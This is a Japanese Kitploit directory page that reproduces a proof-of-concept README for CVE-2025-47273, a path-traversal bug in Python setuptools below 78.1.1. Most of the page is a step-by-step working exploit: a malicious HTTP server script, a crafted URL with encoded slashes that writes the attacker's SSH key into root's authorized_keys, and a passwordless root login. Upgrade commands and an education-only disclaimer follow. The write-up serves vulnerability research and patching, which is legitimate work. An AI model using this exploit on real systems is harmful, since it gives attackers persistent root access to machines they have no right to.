Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47273-POC — CVE-2025-47273 — setuptools パストラバーサル PoC | Kitploit
ツール/GitHubGitHub/alielkhatteb/cve-2025-47273-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストサプライチェーンセキュリティ学習と教育
GitHubalielkhatteb/cve-2025-47273-poc

CVE-2025-47273-POC

CVE-2025-47273 — setuptools パストラバーサル PoC

リポジトリを見る
115ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

setuptools パストラバーサル CVE-2025-47273

📖 概要

Python setuptools < 78.1.1 のパストラバーサル脆弱性に対する概念実証エクスプロイトです。

PackageIndex コンポーネントの _download_url 関数を悪用することで、攻撃者はファイルシステム上の任意の場所に任意のファイルを書き込むことができます — setuptools を実行しているプロセスの権限で。


🎯 脆弱性の概要

フィールド詳細
🎯 ターゲットPython setuptools < 78.1.1
🐛 バグクラスパストラバーサル (CWE-22)
💥 影響任意のファイル書き込み
📍 攻撃ベクトル悪意のあるパッケージインデックスURL
🔍 根本原因os.path.join() は第2引数が / で始まる場合に tmpdir を破棄する

📋 前提条件

  • 両方のマシンに Python 3 がインストールされていること
  • 攻撃者側で SSH 鍵ペアが生成済みであること (~/.ssh/id_rsa + id_rsa.pub)
  • ターゲットスクリプトがユーザー制御の URL で setuptools の PackageIndex を呼び出すこと

🚀 使用方法

🔧 ステップ 1 — SSH 公開鍵を準備する (攻撃者マシン)

root@kitploit:~
# Copy your public key to the current directory to serve it
cp ~/.ssh/id_rsa.pub authorized_keys

📡 ステップ 2 — 悪意のある HTTP サーバーを起動する (攻撃者マシン)

このサーバーはパスに関係なく、任意の GET リクエスト に対して公開鍵を返します。 setuptools はパス /USER/.ssh/authorized_keys を要求しますが、鍵のコンテンツを受け取ります。

root@kitploit:~
cat > python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py

💥 ステップ 3 — パストラバーサルをトリガーする (被害者マシン)

root@kitploit:~
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"

👾 ステップ 4 — root としてログインする (攻撃者マシン)

root@kitploit:~
ssh root@VICTIM_IP

パスワード不要。直接 root シェルを取得。🔑


🔒 パッチ

バージョン 78.1.1 で修正されました。

パッケージマネージャーコマンド
🐍 pippip install --upgrade setuptools
🐧 Debian/Ubuntusudo apt upgrade python3-setuptools
🎩 RHEL/Fedorasudo dnf upgrade python3-setuptools
🏗️ 手動setuptools releases

📎 参考文献

  • 🔗 NVD — CVE-2025-47273

  • 🔗 GitHub Advisory — GHSA-5rjg-fvgr-3xxf

  • 🔗 setuptools 修正コミット

  • 🔗 setuptools poc


⚖️ 免責事項と利用条件

この概念実証 (PoC) コードは、教育および許可されたペネトレーションテスト目的のみ で提供されます。

  • 許可なく このコードを変更、再配布、または他の目的で使用することはできません。
  • 不正な使用や変更は、違法かつ非倫理的 である可能性があります。
  • 著者は、誤用や損害について 一切の責任を負いません。
ツールをダウンロード